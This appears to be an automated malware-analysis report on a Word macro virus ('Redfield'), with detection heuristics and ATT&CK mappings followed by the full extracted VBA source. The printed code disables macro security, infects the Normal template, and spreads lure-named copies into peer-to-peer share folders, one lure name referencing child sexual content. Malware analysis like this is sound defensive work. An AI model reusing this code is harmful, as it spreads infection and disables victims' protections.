Verdict: MALICIOUS
Risk Score: 348
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are automatically executed via the AutoOpen function. These macros disable macro security settings and attempt to export a VBA component to C:\redfield.drv. It then uses WScript.Shell to read the ProgramFilesDir registry value and proceeds to create various executable and document files, suggesting downloader or dropper functionality. The ClamAV detection of Win.Worm.Godog-4 further supports the malicious classification.
Heuristics (8)
- ClamAV: Win.Worm.Godog-4 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Worm.Godog-4
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched lines in script:
  'taken from NWWF by Necronomikom/DCA
  Set shell = CreateObject("wscript.shell")
  Set fso = CreateObject("scripting.filesystemobject")
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched lines in script:
  'taken from NWWF by Necronomikom/DCA
  Set shell = CreateObject("wscript.shell")
  Set fso = CreateObject("scripting.filesystemobject")
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched lines in script:
  Attribute VB_Name = "REDFIELD"
  Sub AutoOpen()
  On Error Resume Next
- Reference to Windows Script Host [high, SC_STR_WSCRIPT]: Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5649 bytes |

SHA-256: 47760b122c5a1b0773c72e1f2f1846f0160aec34ac095acee93cae9053926343
Detection (ClamAV): Win.Worm.Godog-4
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "REDFIELD"
Sub AutoOpen()
On Error Resume Next
Call Infection
End Sub
Sub AutoNew()
On Error Resume Next
Call Infection
End Sub
Sub Infection()
Dim shell, fso
On Error Resume Next
'Redfield
'(c) by Zeraphime
z = 0: S = System: NT = NormalTemplate: AD = ActiveDocument: PPS = PrivateProfileString
With Options
.ConfirmConversions = z
.VirusProtection = z
.SaveNormalPrompt = z
End With
S.PPS("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security", "Level") = 1&
S.PPS("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security", "AccessVBOM") = 1&
WordBasic.DisableAutoMacros z
Set Norm = NT.VBProject.VBComponents
Set Doc = AD.VBProject.VBComponents
If Norm.Item("redfield").Name <> "redfield" Then
Doc("redfield").Export "C:\redfield.drv"
Set i = NT.VBProject
ElseIf Doc.Item("redfield").Name <> "redfield" Then
Norm("redfield").Export "C:\redfield.drv"
Set i = AD.VBProject
End If
i.VBComponents.Import ("C:\redfield.drv")
ActiveDocument.Save
'taken from NWWF by Necronomikom/DCA
Set shell = CreateObject("wscript.shell")
Set fso = CreateObject("scripting.filesystemobject")
Pgdir = shell.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
Files = Array("AIM Password Stealer.exe", "Hot Girl.jpg", "Pussy.jpg", "preteensex.avi", "big boobs.jpg", "nuke afghanistan game.exe", "School Reports.doc", "Sex Tips.doc", "Lord of the rings.doc", "nec is back.doc", "Eminem - I need to be shot.mp3", "BitchSuck.avi")
kl = (Pgdir & "\kazaa lite\my shared folder") & "\"
If fso.folderexists(kl) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
kazaa = (Pgdir & "\kazaa\my shared folder") & "\"
If fso.folderexists(kazaa) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
kmd = (Pgdir & "\kmd\my shared folder") & "\"
If fso.folderexists(kmd) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
grokster = (Pgdir & "\grokster\my grokster") & "\"
If fso.folderexists(grokster) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
bearshare = (Pgdir & "\bearshare\shared") & "\"
If fso.folderexists(bearshare) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
edonkey = (Pgdir & "\edonkey2000\incoming") & "\"
If fso.folderexists(edonkey) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
morpheus = (Pgdir & "\morpheus\my shared folder") & "\"
If fso.folderexists(morpheus) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
limewire = (Pgdir & "\limewire\shared") & "\"
If fso.folderexists(limewire) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Tesla = (Pgdir & "\Tesla\Files") & "\"
If fso.folderexists(Tesla) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
XoloX = (Pgdir & "\XoloX\Downloads") & "\"
If fso.folderexists(XoloX) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Shareaza = (Pgdir & "\Shareaza\downloads\") & "\"
If fso.folderexists(Shareaza) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Gnucleus = (Pgdir & "\Gnucleus\downloads") & "\"
If fso.folderexists(Gnucleus) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
WinMX = (Pgdir & "\WinMX\my shared folder") & "\"
If fso.folderexists(WinMX) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Ftopia3 = (Pgdir & "\Ftopia3\Files") & "\"
If fso.folderexists(Ftopia3) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Toadnode = (Pgdir & "\Toadnode\share") & "\"
If fso.folderexists(Toadnode) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
icq = (Pgdir & "\icq\shared files") & "\"
If fso.folderexists(icq) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Overnet = (Pgdir & "\Overnet\Incoming") & "\"
If fso.folderexists(Overnet) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Rapigator = (Pgdir & "\Rapigator\Share") & "\"
If fso.folderexists(Rapigator) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Apple = (Pgdir & "\AppleJuice\Incoming") & "\"
If fso.folderexists(Apple) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
If S.PPS("", "HKLM\Software\Microsoft\Windows NT\CurrentVersion", "RegisteredOwner") <> "zeraphime" Then
Call msg
Else
Call HDkill
End If
End Sub
Sub msg()
MsgBox "Luke i am your daddy...;)", vbInformation, "REDFIELD Info:"
End Sub
Sub HDkill()
Randomize
For XXX = 1 To Int(Rnd * 10000) + 100
AAA = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65)
MkDir "c:\" & AAA
Next XXX
End Sub
Sub helpabout()
MsgBox "(c) by Zeraphime", vbInformation, "REDFIELD"
End Sub